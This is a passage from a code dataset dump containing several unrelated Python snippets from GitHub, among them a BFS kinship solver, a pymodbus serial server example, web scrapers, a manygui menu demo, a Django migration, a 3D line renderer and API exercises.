str(numpy.average(merge[i])))\n","repo_name":"wesbland/papers","sub_path":"2012/EuroMPI-ulfm/Benchmarks/FaultRevokeShrinkSpawnJoin/time_alt.py","file_name":"time_alt.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18605939626","text":"from collections import deque\n\ndef bfs(v):\n q = deque()\n q.append(v)\n visited[v] = True\n ans = 0\n while q:\n ans += 1 #촌수 관계가있다면 1 증가\n for _ in range(len(q)): #큐의 개수만큼 큐에서 값뺀다.\n k = q.popleft()\n if k == b:\n return ans-1\n for e in arr[k]: #입력받았던 배열의 값 만큼 돌린다\n if visited[e] == False: #방문하지않았을때\n visited[e] = True\n q.append(e) #큐에 담는다.\n\n return -1 # 촌수관계없을시 -1출력\nn = int(input())\na, b = map(int ,input().split(' '))\nm = int(input())\narr = [[] for _ in range(n+1)]\nfor _ in range(m): #촌수 배열에 저장\n x, y = map(int, input().split(' '))\n arr[x].append(y)\n arr[y].append(x)\n\nvisited = [0] * (n+1) #배열 초기화\nprint(bfs(a))","repo_name":"CukCoding/Ju","sub_path":"2022/2022-1-4주차/2644.py","file_name":"2644.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2481490429","text":"\n#!/usr/bin/env python\n\"\"\"\nPymodbus Asynchronous Server Example\n--------------------------------------------------------------------------\nThe asynchronous server is a high performance implementation using the\ntwisted library as its backend. This allows it to scale to many thousands\nof nodes which can be helpful for testing monitoring software.\n\"\"\"\n# --------------------------------------------------------------------------- # \n# import the various server implementations\n# --------------------------------------------------------------------------- # \nfrom pymodbus.server.sync import StartSerialServer\n\nfrom pymodbus.datastore import ModbusSequentialDataBlock\nfrom pymodbus.datastore import ModbusSlaveContext, ModbusServerContext\nfrom pymodbus.transaction import ModbusRtuFramer\n\n# --------------------------------------------------------------------------- # \n# configure the service logging\n# --------------------------------------------------------------------------- # \nimport logging\nFORMAT = ('%(asctime)-15s %(threadName)-15s'\n ' %(levelname)-8s %(module)-15s:%(lineno)-8s %(message)s')\nlogging.basicConfig(format=FORMAT)\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\nPORT='/dev/ttyUSB0'\n\ndef run_server():\n\n# store value 256 at address 40001; 258 address 40002, 261 address 40003, 263 address 40004, 241 address 40005\n\n slave_store1 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40001, [256, 258]), zero_mode=True)\n slave_store2 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40002, [261, 263]), zero_mode=True)\n slave_store4 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40004, [269]), zero_mode=True)\n slave_store3 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40005, [258, 261]), zero_mode=True)\n slaves = {\n 0x01: slave_store1,\n 0x02: slave_store2,\n 0x03: slave_store3,\n 0x04: slave_store4,\n }\t\n context = ModbusServerContext(slaves=slaves, single=False)\n \n # RTU Server\n StartSerialServer(context, port=PORT, framer=ModbusRtuFramer, baudrate=38400)\n\n\nif __name__ == \"__main__\":\n run_server()\n","repo_name":"Ioana22022/cercetation","sub_path":"pymodbus/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1453590311","text":"from decimal import Decimal\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport urllib.request\nimport json\nimport requests\nimport re\nimport pandas as pd\n\nlink1 = 'https://www.dreamgrow.com/top-15-most-popular-social-networking-sites/'\n\n\n# link = \"https://www.bilibili.com/ranking/bangumi/13/0/7\"\n\n\ndef get_HTML(link_name):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.48 Safari/537.36 Edg/85.0.564.23',\n }\n response = requests.get(link_name, headers=headers)\n print(response.status_code)\n response.encoding = None\n if response.status_code != 200:\n raise ConnectionError\n result = response.text\n soup = BeautifulSoup(result, 'html.parser')\n # print(soup)\n return soup\n\n\ndef str_to_double(df_name):\n for c in range(len(df_name)):\n # print(row)\n if re.search('万', df_name[c]):\n row = df_name[c]\n df_name[c] = Decimal(row[:-1])\n else:\n row = df_name[c]\n row = Decimal(row[:-1])\n df_name[c] = row * 10000\n\n\ndef manage_data():\n soup_doc = get_HTML()\n data = []\n i = 0\n\n soup_doc_next = soup_doc.find(\"div\", attrs={\"class\": \"rank-list-wrap\"})\n soup_doc_next_ul = soup_doc_next.find(\"ul\", attrs={\"class\": \"rank-list pgc-list\"})\n soup_find_li = soup_doc_next_ul.find_all('li')\n for s in soup_find_li:\n i += 1\n soup_find_class = s.find(\"div\", attrs={\"class\": \"content\"})\n soup_find_name = soup_find_class.find(\"img\")\n soup_find_detail = soup_find_class.find(\"div\", attrs={\"class\": \"detail\"})\n data_box = soup_find_detail.find_all(\"span\", attrs={\"class\": \"data-box\"})\n play_data = [data.text for data in data_box]\n data.append([i, soup_find_name['alt']] + play_data)\n\n columns = [\"total_rank\", \"title\", \"play\", \"comments\", \"liked\"]\n df = pd.DataFrame(data, columns=columns)\n for name in [\"play\", \"comments\", \"liked\"]:\n str_to_double(df[name])\n print(df)\n\n df.plot.bar(x=df['title'], y=[df['play']])\n plt.show()\n\n\n# manage_data()\n\n# get_HTML(link1)\n\nsoup = get_HTML(link1)\n# print(soup)\n# soup_doc_next = soup.body.div.article.div.table.tbody\n# soup_doc_td = soup_doc_next.findAll(\"tr\")\n# final_value = []\n# final_dict = []\n# for row in soup_doc_td:\n# for next_level in row.findAll(\"a\"):\n# final_value.append(next_level.string)\n# print(final_value)\n# for i in range(0, len(final_value) - 1, 2):\n# final_dict.append({'name': final_value[i], 'value': int(final_value[i + 1].replace(',', ''))})\n# print(final_dict)\ncontent = [i.string for i in soup.body.div.article.div.table.tbody.findAll('a')]\nprint(dict(zip(content[::2], content[1::2])))\n# print(list_final)\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/fetch_bs4.py","file_name":"fetch_bs4.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20577599335","text":"from manygui import Application, Window, MenuBar, Menu, MenuCheck, Label, link, TextField\nfrom manygui.LayoutManagers import SimpleGridManager\n\napp = Application()\n\nwin = Window(title='Menu Example', geometry=(50,50,100,100))\nwin.layout = SimpleGridManager(1,2)\n\n# A menubar for the window.\nmbar = MenuBar()\nwin.addMenu(mbar)\n\n# A menu to choose skits.\nskitMenu = Menu(text=\"Skit\")\nmbar.add(skitMenu)\n\n# Populate the skit menu.\nlbl = Label(text=\"No skit selected\")\nwin.add(lbl)\ndef chooseSkit(ev):\n # Handle a skit choice. A menu event should have a\n # 'text' property containing the text of the menu item.\n lbl.text = ev.text\n\n# The objects returned by the add...() calls are handles that permit\n# us to operate on the menu items later.\ndedPrt = skitMenu.addCommand(text=\"Dead Parrot\")\npengTv = skitMenu.addCommand(text=\"Penguin on the Telly\")\nlink(dedPrt,chooseSkit)\nlink(pengTv,chooseSkit)\n\n# We can also supply a command to the command adder, which\n# does an implicit link() for us. For menu structures\n# that don't change much, this lets us build menus\n# without having to deal with every menu item proxy.\n# This works for checkboxes as well.\nlumbrJk = skitMenu.addCommand(text=\"Lumberjack\",command=chooseSkit)\n\nskitMenu.addSeparator()\n\n# Enable or disable skit silliness: a checkable menu item.\ndef enableSilly(ev):\n #print \"Enabling silly:\",enSilly.on\n # Enable or disable the silliness selection based\n # on the value of the enSilly menu item.\n if enSilly.on:\n # subMenu is defined below.\n subMenu.enabled=1\n else:\n subMenu.enabled=0\nenSilly = skitMenu.addCheck(text=\"Enable Silliness\",on=0,command=enableSilly)\n\n# A sub-menu to allow silliness level to be selected:\n# a mutually-exclusive set of checkable items (radio\n# items?)\nsubMenu = Menu(text=\"Silliness...\",enabled=0)\nsilliness = []\ndef handleSillySelect(ev):\n #print \"Handling silly select...\"\n # Enforce mutual exclusion of silliness level.\n for item in silliness:\n if item != ev.source:\n item.on=0\n else:\n item.on = 1\n\n# We can set the contents of a menu in one go, if we want,\n# instead of calling addThingy() a bunch of times.\nfor txt in [\"Slight\",\"Moderate\",\"Unbearable\"]:\n silliness.append(MenuCheck(text=txt,command=handleSillySelect))\n subMenu.add(silliness[-1])\n#subMenu.contents = silliness\nskitMenu.add(subMenu)\n\nskitMenu.addSeparator()\ndef addSkit(*args,**kws):\n cmd = skitMenu.addCommand(text=entry.text,index=0,command=chooseSkit)\naddCmd = skitMenu.addCommand(text=\"Add Skit\",command=addSkit)\n\n# And a menu for help...\nhelpMenu = Menu(text=\"Help\")\nhelpMenu.addCommand(text=\"About Manygui\")\nmbar.add(helpMenu)\n\nentry = TextField(text=\"Enter new skit\",selection=(0,15))\nwin.add(entry)\n\napp.add(win)\napp.run()\n","repo_name":"progval/Manygui","sub_path":"test/test_menu.py","file_name":"test_menu.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"43762421328","text":"class Solution:\n def maxSatisfied(self, customers: List[int], grumpy: List[int], X: int) -> int:\n maxx = 0\n rr = 0\n for a in range(len(grumpy)):\n if grumpy[a] == 0:\n rr += customers[a]\n\n for a in range(len(grumpy)):\n if grumpy[a] == 1:\n rr += customers[a]\n if a >= X and grumpy[a - X] == 1:\n rr -= customers[a - X]\n if rr > maxx:\n maxx = rr\n\n return maxx\n","repo_name":"itibbers/nb","sub_path":"leetcode/138/1052.py","file_name":"1052.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16145861909","text":"from bs4 import BeautifulSoup\nfrom scrapy.http import HtmlResponse\nfrom scrapy.selector import Selector\nimport requests\nimport re\n\nrequete = requests.get(url=\" \")\npage = requete.content\nsoup = BeautifulSoup(page, \"html.parser\" )\nregex = re.compile(r'[\\n\\r\\t]')\n\nrecepette= soup.find(\"h1\", {\"class\": \"main-title\"}).string\npersonne = soup.find(\"span\", {\"class\": \"title-2 recipe-infos__quantity__value\"}).string\ntemp_preparation = soup.find(\"span\", {\"class\": \"recipe-infos__timmings__value\"}).get_text()\ntemp_cuisson = soup.find(\"span\", {\"class\": \"recipe-infos__timmings__value\"}).get_text()\nlist_ingredient = soup.find_all(\"span\", attrs={\"class\": \"ingredient\"})\nlist_utensil= soup.find_all(\"span\", attrs={\"class\": \"recipe-utensil__name\"})\netapes_preparation = soup.find_all(\"li\", attrs={\"class\": \"recipe-preparation__list__item\"})\n\ndef liste_utensil(list_utensil):\n liste=[]\n for i in list_utensil:\n liste.append(str(i.get_text()).strip())\n return liste\n\ndef liste_ingredient(list_ingredient):\n liste=[]\n for i in list_ingredient:\n liste.append(i.string)\n return liste\n\ndef listes_etapes(etapes_preparation):\n liste=[]\n for e in etapes_preparation:\n r=(e.get_text()).split('\t\t')\n liste.append({\"index\":r[0][7:],\"description\":regex.sub(\"\",r[1])})\n return liste\n\n\ndictionnaire ={\n \"nom_recette\" :recepette,\n \"nombre_personnes\" :personne,\n \"temps_preparation\" :regex.sub(\" \",temp_preparation).strip(),\n \"temps_cuisson\" : regex.sub(\" \",temp_cuisson).strip(),\n \"list_ingredient\" :liste_ingredient(list_ingredient),\n \"list_ustensiles\" : liste_utensil(list_utensil),\n \"etapes_preparation\" : listes_etapes(etapes_preparation)\n}\nprint( dictionnaire)\n","repo_name":"Adja-Fatou-Elisabeth/Cour_open_classrom","sub_path":"Scrapping_de_donne.py","file_name":"Scrapping_de_donne.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42841222761","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContentBlockPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(serialize=False, to='cms.CMSPlugin', primary_key=True, related_name='cms_content_blocks_contentblockpluginmodel', parent_link=True, auto_created=True)),\n ('title', models.CharField(verbose_name='Title', max_length=254)),\n ('slug', models.SlugField(verbose_name='Slug', max_length=254)),\n ('type', models.CharField(choices=[('cadet_blue', 'Cadet blue'), ('burlywood', 'Burlywood'), ('azure', 'Azure'), ('alice_blue', 'Alize blue'), ('corn_silk', 'Corn silk')], default='cadet_blue', verbose_name='Block type', max_length=254)),\n ],\n options={\n 'verbose_name': 'Content blok',\n 'verbose_name_plural': 'Content blocks',\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n","repo_name":"gatsinski/kindergarten-management-system","sub_path":"kindergarten_management_system/kms/contrib/cms_content_blocks/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"19974086986","text":"\nimport moderngl\nimport numpy as np\n\nfrom ..io.voxels import read_binvox\nfrom .base import Renderable\n\n\nclass Lines(Renderable):\n \"\"\"A line is a collection of line segments with colors and a specific width.\n\n Arguments:\n ----------\n points: array-like, the points that compose the line segments.\n colors: array-like, per line-segment color as (r,g,b,a)\n width: float indicating the width of the line\n \"\"\"\n def __init__(self, points, colors=(0.3, 0.3, 0.3, 1.0), width=0.4):\n self._points = np.asarray(points)\n self._colors = np.asarray(colors)\n self._width = width\n\n N = len(self._points)\n if len(self._colors.shape) == 1:\n if self._colors.size == 3:\n self._colors = np.array(self._colors.tolist() + [1])\n self._colors = self._colors[np.newaxis].repeat(N, axis=0)\n elif self._colors.shape[1] == 3:\n self._colors = np.hstack([self._colors, np.ones((N, 1))])\n\n self._prog = None\n self._vbo = None\n self._vao = None\n\n def init(self, ctx):\n self._prog = ctx.program(\n vertex_shader=\"\"\"\n #version 330\n\n in vec3 in_vertex;\n in vec4 in_color;\n out vec4 v_color;\n\n void main() {\n v_color = in_color;\n gl_Position = vec4(in_vertex, 1);\n }\n \"\"\",\n geometry_shader=\"\"\"\n #version 330\n\n layout(lines) in;\n layout(triangle_strip, max_vertices=4) out;\n\n uniform float width;\n uniform mat4 vm;\n uniform mat4 mvp;\n in vec4 v_color[];\n out vec4 t_color;\n\n void main() {\n vec3 camera_position = vm[3].xyz / vm[3].w;\n vec3 first_v = gl_in[0].gl_Position.xyz;\n vec3 last_v = gl_in[1].gl_Position.xyz;\n\n vec3 ray_first = normalize(camera_position - first_v);\n vec3 ray_last = normalize(camera_position - last_v);\n vec3 line = normalize(last_v - first_v);\n vec3 offset_first = cross(ray_first, line)*width/2;\n vec3 offset_last = cross(ray_last, line)*width/2;\n\n gl_Position = mvp * vec4(first_v + offset_first, 1);\n t_color = v_color[0];\n EmitVertex();\n gl_Position = mvp * vec4(first_v - offset_first, 1);\n t_color = v_color[0];\n EmitVertex();\n gl_Position = mvp * vec4(last_v + offset_last, 1);\n t_color = v_color[1];\n EmitVertex();\n gl_Position = mvp * vec4(last_v - offset_last, 1);\n t_color = v_color[1];\n EmitVertex();\n\n EndPrimitive();\n }\n \"\"\",\n fragment_shader=\"\"\"\n #version 330\n\n in vec4 t_color;\n out vec4 f_color;\n\n void main() {\n f_color = t_color;\n }\n \"\"\"\n )\n self._vbo = ctx.buffer(\n np.hstack([self._points, self._colors]).astype(np.float32).tobytes()\n )\n self._vao = ctx.simple_vertex_array(\n self._prog,\n self._vbo,\n \"in_vertex\", \"in_color\"\n )\n\n def release(self):\n self._prog.release()\n self._vbo.release()\n self._vao.release()\n\n def render(self):\n self._vao.render(moderngl.LINES)\n\n def update_uniforms(self, uniforms):\n for k, v in uniforms:\n if k in [\"mvp\", \"vm\"]:\n self._prog[k].write(v.tobytes())\n self._prog[\"width\"].value = self._width\n\n @property\n def bbox(self):\n \"\"\"The axis aligned bounding box of all the vertices as two\n 3-dimensional arrays containing the minimum and maximum for each\n axis.\"\"\"\n return [\n self._points.min(axis=0),\n self._points.max(axis=0)\n ]\n\n def to_unit_cube(self):\n bbox = self.bbox\n dims = bbox[1] - bbox[0]\n self._points -= dims/2 + bbox[0]\n self._points /= dims.max()\n if self._vbo is not None:\n self._vbo.write(np.hstack([\n self._points, self._colors\n ]).astype(np.float32).tobytes())\n\n @classmethod\n def from_voxel_grid(cls, voxels, colors=(0.1, 0.1, 0.1), width=0.001,\n bbox=[[-0.5, -0.5, -0.5], [0.5, 0.5, 0.5]]):\n \"\"\"Create a voxel grid wire frame.\n\n Arguments\n ---------\n voxels: Array of 3D values, with truthy values indicating which\n voxels to fill\n \"\"\"\n # Make sure voxels, colors and bbox are arrays\n voxels, colors, bbox = list(map(np.asarray, [voxels, colors, bbox]))\n\n # Ensure that the voxel grid is indeed a 3D grid\n assert len(voxels.shape) == 3\n M, N, K = voxels.shape\n\n # Compute the size of each side\n sizes = 0.5 * (bbox[1] - bbox[0]) / [M, N, K]\n\n # Convert the indices to center coordinates\n x, y, z = np.indices((M, N, K)).astype(np.float32)\n x = x / M * (bbox[1][0] - bbox[0][0]) + bbox[0][0]\n y = y / N * (bbox[1][1] - bbox[0][1]) + bbox[0][1]\n z = z / K * (bbox[1][2] - bbox[0][2]) + bbox[0][2]\n centers = np.vstack([x[voxels], y[voxels], z[voxels]]).T\n\n # Create an array containing the cube edges\n edges = np.array([[-1, -1, -1], [ 1, -1, -1],\n [ 1, -1, -1], [ 1, 1, -1],\n [ 1, 1, -1], [-1, 1, -1],\n [-1, 1, -1], [-1, -1, -1],\n [-1, -1, 1], [ 1, -1, 1],\n [ 1, -1, 1], [ 1, 1, 1],\n [ 1, 1, 1], [-1, 1, 1],\n [-1, 1, 1], [-1, -1, 1],\n [-1, -1, -1], [-1, -1, 1],\n [-1, 1, -1], [-1, 1, 1],\n [ 1, -1, -1], [ 1, -1, 1],\n [ 1, 1, -1], [ 1, 1, 1]]) * sizes\n\n # Finally create the edges of each cube\n points = centers[:, np.newaxis] + edges[np.newaxis]\n\n # Convert the colors to per edge color\n if len(colors.shape) == 1:\n colors = np.array([colors]*(points.size // 3))\n elif len(colors.shape) == 4:\n colors = colors[voxels]\n colors = np.repeat(colors, len(edges), axis=0)\n\n return cls(points.reshape(-1, 3), colors, width)\n\n @classmethod\n def from_binvox(cls, binvoxfile, colors=(0.1, 0.1, 0.1), width=0.001):\n \"\"\"Create a wireframe for voxel grid read from a binvox file.\n\n Arguments\n ---------\n binvoxfile: str or file object that contains the voxelgrid data in\n binvox format\n colors: The colors of the voxels to pass to from_voxel_grid().\n width: The width of the lines for the wireframe.\n \"\"\"\n voxelgrid, translation, scale = read_binvox(binvoxfile)\n bbox = np.array([[0., 0, 0], [1, 1, 1]]) * scale + translation\n\n return cls.from_voxel_grid(voxelgrid, colors=colors, bbox=bbox,\n width=width)\n\n @classmethod\n def axes(cls, origin=(0, 0, 0), size=1.0, colors=None, width=0.01):\n \"\"\"Create the three axes to be used as a reference.\n\n Arguments\n ---------\n origin: array-like (3,), the origin to put the axes to\n (default: (0, 0, 0))\n size: float or array-like (3,), the size of the axes lines\n (default: 1.)\n colors: None or array-like (3, 3 or 4), the colors to use for each\n of the three axes (default: None)\n width: float, the width of the lines (default: 0.01)\n \"\"\"\n # Normalize the colors argument\n colors = colors or [[0.8, 0.2, 0.2], [0.2, 0.8, 0.2], [0.2, 0.2, 0.8]]\n colors = np.asarray(colors)\n if len(colors.shape) == 1:\n colors = colors[None]\n if len(colors) == 1:\n colors = np.repeat(colors, 3, axis=0)\n elif len(colors) != 3:\n raise ValueError(\"colors should contain 1 or 3 colors\")\n if colors.shape[1] == 3:\n colors = np.hstack([colors, np.ones((3, 1))])\n elif colors.shape[1] != 4:\n raise ValueError(\"colors should be either 3 or 4 values\")\n colors = np.repeat(colors, 2, axis=0)\n assert colors.shape == (6, 4)\n\n # Normalize the size argument\n size = np.ones(3) * size\n assert size.shape == (3,)\n\n # Normalize the origin argument\n origin = np.asarray(origin)\n assert origin.shape == (3,)\n\n axes = np.array([[0, 0, 0],\n [1, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [0, 0, 0],\n [0, 0, 1.]]) * size + origin\n\n return cls(axes, colors, width=width)\n","repo_name":"angeloskath/simple-3dviz","sub_path":"simple_3dviz/renderables/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"21"} +{"seq_id":"37653848367","text":"# -*- python -*-\n\nload(\"@drake//tools/workspace:github.bzl\", \"github_archive\")\n\ndef fmt_repository(\n name,\n mirrors = None):\n github_archive(\n name = name,\n repository = \"fmtlib/fmt\",\n # When changing the fmt version, also update the URL in the file\n # overview docstring of drake/common/text_logging.h.\n commit = \"7.1.0\",\n sha256 = \"a53bce7e3b7ee8c7374723262a43356afff176b1684b86061748409e6f8b56c5\", # noqa\n build_file = \"@drake//tools/workspace/fmt:package.BUILD.bazel\",\n mirrors = mirrors,\n )\n","repo_name":"victoralad/drake","sub_path":"tools/workspace/fmt/repository.bzl","file_name":"repository.bzl","file_ext":"bzl","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73637332211","text":"import pygame\r\nfrom env import droneEnv\r\nenv = droneEnv()\r\n\r\n\r\nprint(\"\\n\\n\")\r\nprint(\"Observation space:\")\r\nprint(env.observation_space)\r\nprint(\"\")\r\nprint(\"Action space:\")\r\nprint(env.action_space)\r\nprint(\"\")\r\nprint(\"Action space sample:\")\r\nprint(env.action_space.sample(),\"\\n\\n\")\r\n\r\n\r\nepisode = 0\r\nwhile episode < 10:\r\n state = env.reset()\r\n done = False\r\n score = 0\r\n \r\n while not done:\r\n \r\n #env.render() # Step method already involves rendering\r\n pygame.time.delay(5)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n \r\n action = env.action_space.sample()\r\n n_state, reward, done, info = env.step(action)\r\n score += reward\r\n episode += 1\r\n print('Episode: {} Score: {}'.format(episode , score))\r\n\r\npygame.display.quit()\r\npygame.quit()","repo_name":"RsGoksel/Mechopter","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42235491421","text":"import requests\r\nimport json\r\nfrom datetime import date, datetime\r\n\r\n# --- ISS --- #\r\n# response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\r\n\r\n# # if response.status_code == 404:\r\n# # raise Exception(\"Resource does not exist.\")\r\n# # elif response.status_code == 401:\r\n# # raise Exception(\"You are not authorized to access this data.\")\r\n\r\n# # instead of going over each HTTP codes\r\n# response.raise_for_status()\r\n\r\n# # get data from api\r\n# data = response.json()[\"iss_position\"]\r\n# longitude = data[\"longitude\"]\r\n# latitude = data[\"latitude\"]\r\n# print(longitude, latitude)\r\n\r\nMY_LAT = 51.507351\r\nMY_LONG = -0.127758\r\n\r\nparameters = {\r\n \"lat\": MY_LAT,\r\n \"lng\": MY_LONG,\r\n \"formatted\": 0, #24-hour clock\r\n}\r\n\r\nresponse = requests.get(\"https://api.sunrise-sunset.org/json\", params=parameters)\r\nresponse.raise_for_status()\r\ndata = response.json()\r\nsunrise = data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0]\r\nsunset = data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0]\r\n\r\ntime_now = datetime.now()\r\n\r\nprint(sunrise, sunset)\r\nprint(time_now.hour)","repo_name":"maryletteroa/100DaysOfCode-Python","sub_path":"33/day_33_exercises.py","file_name":"day_33_exercises.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}